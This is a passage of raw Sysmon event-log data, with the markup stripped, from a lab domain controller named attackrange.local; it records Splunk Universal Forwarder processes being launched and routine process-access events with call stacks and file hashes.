16:50:35.589{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180069Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:35.589{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180068Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:35.589{29E67E80-7CBD-6019-0500-00000000A301}640656C:\Windows\system32\csrss.exe{29E67E80-D45B-601A-3E30-00000000A301}6696C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000180067Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:35.589{29E67E80-7D64-6019-B000-00000000A301}11603872C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{29E67E80-D45B-601A-3E30-00000000A301}6696C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000180066Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:35.589{29E67E80-D45B-601A-3E30-00000000A301}6696C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{29E67E80-7CBD-6019-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000180065Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:35.073{29E67E80-D45A-601A-3D30-00000000A301}24003488C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180090Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:36.776{29E67E80-D45C-601A-4030-00000000A301}28045200C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180089Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:36.620{29E67E80-7D64-6019-B400-00000000A301}16482392C:\Windows\system32\conhost.exe{29E67E80-D45C-601A-4030-00000000A301}2804C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180088Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:36.620{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180087Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:36.620{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180086Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:36.620{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180085Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:36.620{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180084Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:36.620{29E67E80-7CBD-6019-0500-00000000A301}640756C:\Windows\system32\csrss.exe{29E67E80-D45C-601A-4030-00000000A301}2804C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000180083Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:36.620{29E67E80-7D64-6019-B000-00000000A301}11603872C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{29E67E80-D45C-601A-4030-00000000A301}2804C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000180082Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:36.621{29E67E80-D45C-601A-4030-00000000A301}2804C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{29E67E80-7CBD-6019-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000180081Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:36.104{29E67E80-7D64-6019-B400-00000000A301}16482392C:\Windows\system32\conhost.exe{29E67E80-D45C-601A-3F30-00000000A301}4384C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180080Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:36.104{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180079Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:36.104{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180078Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:36.104{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180077Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:36.104{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180076Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:36.104{29E67E80-7CBD-6019-0500-00000000A301}640656C:\Windows\system32\csrss.exe{29E67E80-D45C-601A-3F30-00000000A301}4384C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000180075Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:36.104{29E67E80-7D64-6019-B000-00000000A301}11603872C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{29E67E80-D45C-601A-3F30-00000000A301}4384C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000180074Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:36.105{29E67E80-D45C-601A-3F30-00000000A301}4384C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{29E67E80-7CBD-6019-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000180107Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:37.886{29E67E80-7D64-6019-B400-00000000A301}16482392C:\Windows\system32\conhost.exe{29E67E80-D45D-601A-4230-00000000A301}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180106Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:37.886{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180105Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:37.886{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180104Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:37.886{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180103Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:37.886{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180102Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:37.886{29E67E80-7CBD-6019-0500-00000000A301}640756C:\Windows\system32\csrss.exe{29E67E80-D45D-601A-4230-00000000A301}6724C:\Program 